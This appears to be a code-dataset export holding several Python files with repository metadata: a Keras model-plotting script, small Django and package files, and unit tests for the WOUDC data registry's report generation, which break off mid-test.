| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
138f10fa2b440d2e2b544a9d8b86983c0299f676
| 156
|
py
|
Python
|
utils/draw_net.py
|
lyzMaster/DeepGTA5-V2
|
f290e8957e1a0b6837cd391f110961a6cc97aa51
|
[
"MIT"
] | 12
|
2019-05-30T06:00:36.000Z
|
2022-02-24T18:08:15.000Z
|
utils/draw_net.py
|
HTL2018/DeepGTA5-V2
|
096f2fa1e991a68bf3d9243a310d9bd487740700
|
[
"MIT"
] | null | null | null |
utils/draw_net.py
|
HTL2018/DeepGTA5-V2
|
096f2fa1e991a68bf3d9243a310d9bd487740700
|
[
"MIT"
] | 6
|
2019-08-27T16:30:45.000Z
|
2021-12-27T03:45:19.000Z
|
from keras.utils import plot_model
from models.main_model import main_model
plot_model(main_model(), to_file='model.png', show_shapes=True) # 使用。。。画神经网络
| 31.2
| 78
| 0.788462
| 26
| 156
| 4.461538
| 0.615385
| 0.232759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 156
| 4
| 79
| 39
| 0.828571
| 0.064103
| 0
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13970f8cf709cffa4e488754d74c8216e97aae51
| 22
|
py
|
Python
|
tests/fixtures/internal/subpackage_a/__init__.py
|
gitter-badger/dependenpy
|
db411b7bbd466b79064cbb419049f17cd3bff4c1
|
[
"ISC"
] | 10
|
2020-01-08T10:42:32.000Z
|
2021-07-08T01:58:08.000Z
|
tests/fixtures/internal/subpackage_a/__init__.py
|
gitter-badger/dependenpy
|
db411b7bbd466b79064cbb419049f17cd3bff4c1
|
[
"ISC"
] | 18
|
2015-03-13T11:55:49.000Z
|
2017-06-20T11:56:46.000Z
|
tests/fixtures/internal/subpackage_a/__init__.py
|
gitter-badger/dependenpy
|
db411b7bbd466b79064cbb419049f17cd3bff4c1
|
[
"ISC"
] | 1
|
2019-12-10T18:32:05.000Z
|
2019-12-10T18:32:05.000Z
|
import external as ex
| 11
| 21
| 0.818182
| 4
| 22
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13f1d697b124d8055ddb23495d0a49267bde1ac7
| 2,559
|
py
|
Python
|
decisiontree/multitenancy/tests/test_utils.py
|
datamade/rapidsms-decisiontree-app
|
7613a43f1bb17ffcd6d5a5d6d6f93ad9c09bd2a6
|
[
"BSD-3-Clause"
] | 1
|
2018-08-23T06:29:23.000Z
|
2018-08-23T06:29:23.000Z
|
decisiontree/multitenancy/tests/test_utils.py
|
datamade/rapidsms-decisiontree-app
|
7613a43f1bb17ffcd6d5a5d6d6f93ad9c09bd2a6
|
[
"BSD-3-Clause"
] | 9
|
2018-08-07T20:37:52.000Z
|
2018-12-28T17:17:16.000Z
|
decisiontree/multitenancy/tests/test_utils.py
|
datamade/rapidsms-decisiontree-app
|
7613a43f1bb17ffcd6d5a5d6d6f93ad9c09bd2a6
|
[
"BSD-3-Clause"
] | null | null | null |
import mock
from django.test import TestCase
from .. import utils
@mock.patch('decisiontree.multitenancy.utils.multitenancy_enabled')
@mock.patch('decisiontree.multitenancy.utils.reverse')
class TestTenancyReverse(TestCase):
def setUp(self):
super(TestTenancyReverse, self).setUp()
self.request = mock.Mock(group_slug='group', tenant_slug='tenant')
def test_args_tenancy_enabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = True
val = utils.tenancy_reverse(self.request, 'test_url', 'a', 'b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': (self.request.group_slug, self.request.tenant_slug, 'a', 'b'),
'kwargs': {},
})
def test_args_tenancy_disabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = False
val = utils.tenancy_reverse(self.request, 'test_url', 'a', 'b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': ('a', 'b'),
'kwargs': {},
})
def test_kwargs_tenancy_enabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = True
val = utils.tenancy_reverse(self.request, 'test_url', a='a', b='b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': (),
'kwargs': {
'tenant_slug': self.request.tenant_slug,
'group_slug': self.request.group_slug,
'a': 'a',
'b': 'b',
},
})
def test_kwargs_tenancy_disabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = False
val = utils.tenancy_reverse(self.request, 'test_url', a='a', b='b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': (),
'kwargs': {
'a': 'a',
'b': 'b',
},
})
| 38.19403
| 82
| 0.611567
| 287
| 2,559
| 5.254355
| 0.142857
| 0.087533
| 0.116711
| 0.137931
| 0.803714
| 0.700265
| 0.700265
| 0.700265
| 0.700265
| 0.700265
| 0
| 0.006218
| 0.245799
| 2,559
| 66
| 83
| 38.772727
| 0.77513
| 0
| 0
| 0.666667
| 0
| 0
| 0.096522
| 0.035561
| 0
| 0
| 0
| 0
| 0.280702
| 1
| 0.087719
| false
| 0
| 0.052632
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b91cfadb2c612b733dab1c074886d48c8a70f67b
| 176
|
py
|
Python
|
students/K33402/Puzyrev_Dmitry/practical_works/django_simple_app/practice3/django_project_puzyrev/project_first_app/admin.py
|
ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021
|
bb91c91a56d21cec2b12ae4cc722eaa652a88420
|
[
"MIT"
] | 4
|
2020-09-03T15:41:42.000Z
|
2021-12-24T15:28:20.000Z
|
students/K33402/Puzyrev_Dmitry/practical_works/django_simple_app/practice3/django_project_puzyrev/project_first_app/admin.py
|
ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021
|
bb91c91a56d21cec2b12ae4cc722eaa652a88420
|
[
"MIT"
] | 48
|
2020-09-13T20:22:42.000Z
|
2021-04-30T11:13:30.000Z
|
students/K33402/Puzyrev_Dmitry/practical_works/django_simple_app/practice3/django_project_puzyrev/project_first_app/admin.py
|
ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021
|
bb91c91a56d21cec2b12ae4cc722eaa652a88420
|
[
"MIT"
] | 69
|
2020-09-06T10:32:37.000Z
|
2021-11-28T18:13:17.000Z
|
from django.contrib import admin
from .models import *
admin.site.register(Driver)
admin.site.register(Car)
admin.site.register(Ownership)
admin.site.register(DrivingLicence)
| 22
| 35
| 0.818182
| 24
| 176
| 6
| 0.5
| 0.25
| 0.472222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073864
| 176
| 8
| 35
| 22
| 0.883436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b9425fee27fbae52100682df06aafebec462865a
| 114
|
py
|
Python
|
typecasts/__init__.py
|
python-platonic/typecasts
|
01deaadfdc7ee7312999104904f717f52013f143
|
[
"MIT"
] | 3
|
2020-10-05T17:26:54.000Z
|
2022-02-11T09:15:18.000Z
|
typecasts/__init__.py
|
python-platonic/typecasts
|
01deaadfdc7ee7312999104904f717f52013f143
|
[
"MIT"
] | 8
|
2020-10-02T06:29:20.000Z
|
2021-07-02T11:17:10.000Z
|
typecasts/__init__.py
|
python-platonic/typecasts
|
01deaadfdc7ee7312999104904f717f52013f143
|
[
"MIT"
] | null | null | null |
from typecasts.defaults import casts
from typecasts.identity import identity
from typecasts.main import Typecasts
| 28.5
| 39
| 0.868421
| 15
| 114
| 6.6
| 0.466667
| 0.393939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 114
| 3
| 40
| 38
| 0.970588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b96699bfadc5ced08f362942f0c4f7b73a991e88
| 45,164
|
py
|
Python
|
woudc_data_registry/tests/test_report_generation.py
|
danielwaiforssell/woudc-data-registry
|
6049f4f31c81558e5a3fb58905e69ce3605cbc60
|
[
"MIT"
] | null | null | null |
woudc_data_registry/tests/test_report_generation.py
|
danielwaiforssell/woudc-data-registry
|
6049f4f31c81558e5a3fb58905e69ce3605cbc60
|
[
"MIT"
] | null | null | null |
woudc_data_registry/tests/test_report_generation.py
|
danielwaiforssell/woudc-data-registry
|
6049f4f31c81558e5a3fb58905e69ce3605cbc60
|
[
"MIT"
] | null | null | null |
import csv
import pathlib
import os
import unittest
from datetime import datetime
from woudc_data_registry import models, parser, report, util
SANDBOX_DIR = '/tmp/woudc-data-registry'
def dummy_extCSV(source):
"""
Returns a parser.ExtendedCSV instace built from the filepath <source>
with dummy output settings (no logs or reports).
"""
with report.OperatorReport() as error_bank:
return parser.ExtendedCSV(source, error_bank)
def resolve_test_data_path(test_data_file):
"""
helper function to ensure filepath is valid
for different testing context (setuptools, directly, etc.)
:param test_data_file: Relative path to an input file.
:returns: Full path to the input file.
"""
if os.path.exists(test_data_file):
return test_data_file
else:
path = os.path.join('woudc_data_registry', 'tests', test_data_file)
if os.path.exists(path):
return path
def clear_sandbox():
"""
Clean up report generation tests by deleting any files in the
sandbox directory.
"""
for filename in os.listdir(SANDBOX_DIR):
fullpath = os.path.join(SANDBOX_DIR, filename)
os.remove(fullpath)
class SandboxTestSuite(unittest.TestCase):
"""Superclass for test classes that write temporary files to a sandbox"""
def setUpClass():
os.mkdir(SANDBOX_DIR)
def tearDownClass():
os.rmdir(SANDBOX_DIR)
def tearDown(self):
clear_sandbox()
class OperatorReportTest(SandboxTestSuite):
"""Test suite for OperatorReport, error severity, and file format"""
def test_operator_report_output_location(self):
"""Test that operator reports write a file in the working directory"""
with report.OperatorReport(SANDBOX_DIR) as op_report:
operator_path = pathlib.Path(op_report.filepath())
self.assertEquals(str(operator_path.parent), SANDBOX_DIR)
def test_uses_error_definition(self):
"""Test that error/warning feedback responds to input files"""
# The two error files below have different error types for error 1.
all_warnings = resolve_test_data_path('config/all_warnings.csv')
all_errors = resolve_test_data_path('config/all_errors.csv')
with report.OperatorReport(SANDBOX_DIR) as op_report:
op_report.read_error_definitions(all_warnings)
self.assertIn(1, op_report._error_definitions)
_, success = op_report.add_message(1)
self.assertFalse(success)
op_report.read_error_definitions(all_errors)
self.assertIn(1, op_report._error_definitions)
_, success = op_report.add_message(1)
self.assertTrue(success)
def test_passing_operator_report(self):
"""Test that a passing file is written in the operator report"""
filename = '20080101.Kipp_Zonen.UV-S-E-T.000560.PMOD-WRC.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
with report.OperatorReport(SANDBOX_DIR) as op_report:
ecsv = parser.ExtendedCSV(contents, op_report)
ecsv.validate_metadata_tables()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = filename
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
op_report.add_message(200) # File passes validation
op_report.write_passing_file(infile, ecsv, data_record)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
report_line = next(reader)
self.assertEquals(report_line[0], 'P')
self.assertEquals(report_line[2], '200')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
with self.assertRaises(StopIteration):
next(reader)
def test_warning_operator_report(self):
"""Test that file warnings are written in the operator report"""
filename = 'ecsv-trailing-commas.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
with report.OperatorReport(SANDBOX_DIR) as op_report:
ecsv = parser.ExtendedCSV(contents, op_report)
# Some warnings are encountered during parsing.
ecsv.validate_metadata_tables()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = filename
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
op_report.add_message(200) # File passes validation
op_report.write_passing_file(infile, ecsv, data_record)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
expected_warnings = len(ecsv.warnings)
for _ in range(expected_warnings):
report_line = next(reader)
self.assertEquals(report_line[0], 'P')
self.assertEquals(report_line[1], 'Warning')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
report_line = next(reader)
self.assertEquals(report_line[0], 'P')
self.assertEquals(report_line[1], 'Warning')
self.assertEquals(report_line[2], '200')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
with self.assertRaises(StopIteration):
next(reader)
def test_failing_operator_report(self):
"""Test that a failing file is written in the operator report"""
filename = 'ecsv-missing-instrument-name.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
ecsv = None
agency = 'UNKNOWN'
with report.OperatorReport(SANDBOX_DIR) as op_report:
try:
ecsv = parser.ExtendedCSV(contents, op_report)
ecsv.validate_metadata_tables()
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
ecsv.validate_dataset_tables()
raise AssertionError('Parsing of {} did not fail'
.format(infile))
except (parser.MetadataValidationError,
parser.NonStandardDataError):
output_path = os.path.join(SANDBOX_DIR, 'run1')
op_report.add_message(209)
op_report.write_failing_file(infile, agency, ecsv)
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
warnings = 0
errors = 0
expected_warnings = len(ecsv.warnings)
expected_errors = len(ecsv.errors)
for _ in range(expected_warnings + expected_errors):
report_line = next(reader)
self.assertEquals(report_line[0], 'F')
if report_line[1] == 'Warning':
warnings += 1
elif report_line[1] == 'Error':
errors += 1
self.assertEquals(warnings, expected_warnings)
self.assertEquals(errors, expected_errors)
report_line = next(reader)
self.assertEquals(report_line[0], 'F')
self.assertEquals(report_line[1], 'Error')
self.assertEquals(report_line[2], '209')
self.assertIn(agency, report_line)
self.assertIn(os.path.basename(infile), report_line)
with self.assertRaises(StopIteration):
next(reader)
def test_mixed_operator_report(self):
"""
Test that passing and failing files are written to the operator report
when a mixture of the two is processed
"""
infile_root = resolve_test_data_path('data/general/pass_and_fail')
warnings = {}
errors = {}
expected_warnings = {}
expected_errors = {}
agency = 'UNKNOWN'
with report.OperatorReport(SANDBOX_DIR) as op_report:
for infile in os.listdir(infile_root):
fullpath = os.path.join(infile_root, infile)
warnings[fullpath] = 0
errors[fullpath] = 0
try:
contents = util.read_file(fullpath)
ecsv = parser.ExtendedCSV(contents, op_report)
except (parser.MetadataValidationError,
parser.NonStandardDataError) as err:
expected_errors[fullpath] = len(err.errors)
op_report.add_message(209)
op_report.write_failing_file(fullpath, agency)
continue
try:
ecsv.validate_metadata_tables()
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = infile
expected_warnings[fullpath] = len(ecsv.warnings)
expected_errors[fullpath] = 0
op_report.write_passing_file(fullpath, ecsv, data_record)
except (parser.MetadataValidationError,
parser.NonStandardDataError):
expected_warnings[fullpath] = len(ecsv.warnings)
expected_errors[fullpath] = len(ecsv.errors)
op_report.add_message(209)
op_report.write_failing_file(fullpath, agency, ecsv)
today = datetime.now().strftime('%Y-%m-%d')
output_path = os.path.join(SANDBOX_DIR,
'operator-report-{}.csv'.format(today))
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
reader = csv.reader(output)
next(reader)
for line in reader:
if expected_errors[line[12]] == 0:
self.assertEquals(line[0], 'P')
self.assertEquals(line[1], 'Warning')
else:
self.assertEquals(line[0], 'F')
if line[2] == '200':
self.assertEquals(expected_errors[line[12]], 0)
elif line[2] == '209':
self.assertGreater(expected_errors[line[12]], 0)
elif line[1] == 'Warning':
warnings[line[12]] += 1
elif line[1] == 'Error':
errors[line[12]] += 1
self.assertEquals(warnings, expected_warnings)
self.assertEquals(errors, expected_errors)
class RunReportTest(SandboxTestSuite):
"""Test suite for RunReport, file writing and file format"""
def test_run_report_output_location(self):
"""Test that run reports write a file in the working directory"""
run_report = report.RunReport(SANDBOX_DIR)
run_report_path = pathlib.Path(run_report.filepath())
self.assertEquals(str(run_report_path.parent), SANDBOX_DIR)
def test_passing_run_report(self):
"""Test that a passing file is written to the run report"""
filename = '20080101.Kipp_Zonen.UV-S-E-T.000560.PMOD-WRC.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
run_report = report.RunReport(SANDBOX_DIR)
with report.OperatorReport() as error_bank:
ecsv = parser.ExtendedCSV(contents, error_bank)
ecsv.validate_metadata_tables()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = filename
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
output_path = os.path.join(SANDBOX_DIR, 'run_report')
run_report.write_passing_file(infile, agency)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 2)
self.assertEquals(lines[0], agency)
self.assertEquals(lines[1], 'Pass: {}'.format(infile))
def test_failing_run_report(self):
"""Test that a failing file is written to the run report"""
filename = 'ecsv-missing-instrument-name.csv'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
ecsv = None
# Agency typically filled in with FTP username for failing files.
agency = 'rmda'
with report.OperatorReport() as error_bank:
run_report = report.RunReport(SANDBOX_DIR)
try:
ecsv = parser.ExtendedCSV(contents, error_bank)
ecsv.validate_metadata_tables()
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
ecsv.validate_dataset_tables()
raise AssertionError('Parsing of {} did not fail'
.format(infile))
except (parser.MetadataValidationError,
parser.NonStandardDataError):
output_path = os.path.join(SANDBOX_DIR, 'run_report')
run_report.write_failing_file(infile, agency)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 2)
self.assertEquals(lines[0], agency)
self.assertEquals(lines[1], 'Fail: {}'.format(infile))
def test_non_extcsv_run_report(self):
"""Test that an unparseable file is written to the run report"""
filename = 'not-an-ecsv.dat'
infile = resolve_test_data_path('data/general/{}'.format(filename))
contents = util.read_file(infile)
agency = 'UNKNOWN'
with report.OperatorReport() as error_bank:
run_report = report.RunReport(SANDBOX_DIR)
try:
_ = parser.ExtendedCSV(contents, error_bank)
raise AssertionError('Parsing of {} did not fail'
.format(infile))
except (parser.MetadataValidationError,
parser.NonStandardDataError):
output_path = os.path.join(SANDBOX_DIR, 'run_report')
run_report.write_failing_file(infile, agency)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 2)
self.assertEquals(lines[0], agency)
self.assertEquals(lines[1], 'Fail: {}'.format(infile))
def test_mixed_run_report(self):
"""
Test that passing and failing files are written to the run report
when a mixture of the two is processed
"""
infile_root = resolve_test_data_path('data/general/pass_and_fail')
agency = 'MSC'
expected_passes = set()
expected_fails = set()
with report.OperatorReport() as error_bank:
run_report = report.RunReport(SANDBOX_DIR)
for infile in os.listdir(infile_root):
fullpath = os.path.join(infile_root, infile)
try:
contents = util.read_file(fullpath)
ecsv = parser.ExtendedCSV(contents, error_bank)
except (parser.MetadataValidationError,
parser.NonStandardDataError):
expected_fails.add(fullpath)
run_report.write_failing_file(fullpath, agency)
continue
try:
ecsv.validate_metadata_tables()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = infile
expected_passes.add(fullpath)
run_report.write_passing_file(fullpath, agency)
except (parser.MetadataValidationError,
parser.NonStandardDataError):
expected_fails.add(fullpath)
run_report.write_failing_file(fullpath, agency)
self.assertEquals(len(expected_passes), 6)
self.assertEquals(len(expected_fails), 4)
output_path = os.path.join(SANDBOX_DIR, 'run_report')
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(lines[0], agency)
self.assertEquals(len(lines),
len(expected_passes) + len(expected_fails) + 1)
for line in lines[1:]:
if line.startswith('Pass'):
target = line[6:].strip()
self.assertIn(target, expected_passes)
elif line.startswith('Fail'):
target = line[6:].strip()
self.assertIn(target, expected_fails)
def test_run_report_multiple_agencies(self):
"""Test that files in the run report are grouped by agency"""
infile_root = resolve_test_data_path('data/general/agencies')
expected_passes = {}
expected_fails = {}
agency_aliases = {
'msc': 'MSC',
'casiap': 'CAS-IAP',
'mlcd-lu': 'MLCD-LU',
'dwd-mohp': 'DWD-MOHp'
}
with report.OperatorReport() as error_bank:
run_report = report.RunReport(SANDBOX_DIR)
for dirpath, dirnames, filenames in os.walk(infile_root):
for infile in filenames:
fullpath = os.path.join(dirpath, infile)
# Agency inferred from directory name.
agency = dirpath.split('/')[-1]
try:
contents = util.read_file(fullpath)
ecsv = parser.ExtendedCSV(contents, error_bank)
except (parser.MetadataValidationError,
parser.NonStandardDataError):
if agency not in expected_passes:
expected_passes[agency] = set()
if agency not in expected_fails:
expected_fails[agency] = set()
expected_fails[agency].add(fullpath)
run_report.write_failing_file(fullpath, agency)
continue
try:
ecsv.validate_metadata_tables()
agency = ecsv.extcsv['DATA_GENERATION']['Agency']
if agency not in expected_passes:
expected_passes[agency] = set()
if agency not in expected_fails:
expected_fails[agency] = set()
ecsv.validate_dataset_tables()
data_record = models.DataRecord(ecsv)
data_record.filename = infile
expected_passes[agency].add(fullpath)
run_report.write_passing_file(fullpath, agency)
except (parser.MetadataValidationError,
parser.NonStandardDataError):
agency = agency_aliases[agency]
if agency not in expected_passes:
expected_passes[agency] = set()
if agency not in expected_fails:
expected_fails[agency] = set()
expected_fails[agency].add(fullpath)
run_report.write_failing_file(fullpath, agency)
self.assertEquals(len(expected_passes['CAS-IAP']), 1)
self.assertEquals(len(expected_passes['DWD-MOHp']), 2)
self.assertEquals(len(expected_passes['MLCD-LU']), 3)
self.assertEquals(len(expected_passes['MSC']), 4)
self.assertEquals(len(expected_fails['CAS-IAP']), 0)
self.assertEquals(len(expected_fails['DWD-MOHp']), 1)
self.assertEquals(len(expected_fails['MLCD-LU']), 0)
self.assertEquals(len(expected_fails['MSC']), 1)
output_path = os.path.join(SANDBOX_DIR, 'run_report')
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
curr_agency = None
for line in lines:
if line.startswith('Pass'):
target = line[6:]
self.assertIn(target, expected_passes[curr_agency])
elif line.startswith('Fail'):
target = line[6:]
self.assertIn(target, expected_fails[curr_agency])
elif line.strip() != '':
curr_agency = line.strip()
self.assertIn(line, agency_aliases.values())
class EmailSummaryTest(SandboxTestSuite):
"""
Test suite for EmailSummary, output format, and detection of passes,
fixes, and fails
"""
def test_email_summary_output_location(self):
"""Test that email summaries write a file in the working directory"""
email_report = report.EmailSummary(SANDBOX_DIR)
email_report_path = pathlib.Path(email_report.filepath())
self.assertEquals(str(email_report_path.parent), SANDBOX_DIR)
def test_find_operator_report_empty(self):
"""Test that no operator reports are found when none exist"""
project_root = resolve_test_data_path('data/reports')
email_report = report.EmailSummary(project_root)
operator_reports = email_report.find_operator_reports()
self.assertEquals([], operator_reports)
def test_find_operator_report_one_run(self):
"""Test that operator reports are found when one exists"""
project_root = resolve_test_data_path('data/reports/one_pass')
email_report = report.EmailSummary(project_root)
operator_reports = email_report.find_operator_reports()
expected_parent = resolve_test_data_path('data/reports/one_pass/run1')
self.assertEquals(1, len(operator_reports))
self.assertIn(expected_parent, operator_reports[0])
def test_find_operator_report_many_runs(self):
"""
Test that all operator reports are found when they are spread
across multiple run directories
"""
project_root = resolve_test_data_path('data/reports/six_reports')
email_report = report.EmailSummary(project_root)
operator_reports = email_report.find_operator_reports()
expected_path_pattern = \
'data/reports/six_reports/run{}/operator-report-9999-12-31.csv'
self.assertEquals(6, len(operator_reports))
for run_number in range(1, 6 + 1):
expected_path = resolve_test_data_path(
expected_path_pattern.format(run_number))
self.assertIn(expected_path, set(operator_reports))
def test_email_summary_single_pass(self):
"""Test email report generation for a single passing file"""
input_root = resolve_test_data_path('data/reports/one_pass')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@site.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 5)
self.assertEquals(lines[0], 'MSC (placeholder@site.com)')
self.assertEquals(lines[1], 'Total files received: 1')
self.assertEquals(lines[2], 'Number of passed files: 1')
self.assertEquals(lines[3], 'Number of manually repaired files: 0')
self.assertEquals(lines[4], 'Number of failed files: 0')
def test_email_summary_single_fail(self):
"""Test email report generation for a single failing file"""
input_root = resolve_test_data_path('data/reports/one_fail')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@site.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 8)
self.assertEquals(lines[0], 'MSC (placeholder@site.com)')
self.assertEquals(lines[1], 'Total files received: 1')
self.assertEquals(lines[2], 'Number of passed files: 0')
self.assertEquals(lines[3], 'Number of manually repaired files: 0')
self.assertEquals(lines[4], 'Number of failed files: 1')
self.assertEquals(lines[5], 'Summary of Failures:')
self.assertNotIn('.csv', lines[6])
self.assertEquals(lines[7], 'file1.csv')
def test_email_summary_one_run_mixed_pass_fail(self):
"""
Test email report generation with passing and failing files
all in one operator report
"""
input_root = resolve_test_data_path('data/reports//pass_and_fail')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@site.com'}
email_report.write(emails)
today = datetime.now().strftime('%Y-%m-%d')
output_filename = 'failed-files-{}'.format(today)
output_path = os.path.join(SANDBOX_DIR, output_filename)
self.assertTrue(os.path.exists(output_path))
with open(output_path) as output:
lines = output.read().splitlines()
self.assertEquals(len(lines), 10)
self.assertEquals(lines[0], 'MSC (placeholder@site.com)')
self.assertEquals(lines[1], 'Total files received: 5')
self.assertEquals(lines[2], 'Number of passed files: 2')
self.assertEquals(lines[3], 'Number of manually repaired files: 0')
self.assertEquals(lines[4], 'Number of failed files: 3')
self.assertEquals(lines[5], 'Summary of Failures:')
self.assertNotIn('.csv', lines[6])
# Alphabetical order of files: the first one has capital F.
self.assertEquals(lines[7], 'File5.csv')
self.assertEquals(lines[8], 'file2.csv')
self.assertEquals(lines[9], 'file3.csv')
def test_email_summary_multiple_causes_one_group(self):
"""
Test email report generation where a single group of files
experiences multiple error types.
"""
input_root = resolve_test_data_path('data/reports/multiple_causes')
email_report = report.EmailSummary(input_root, SANDBOX_DIR)
emails = {'MSC': 'placeholder@site.com'}
email_report.write(emails)
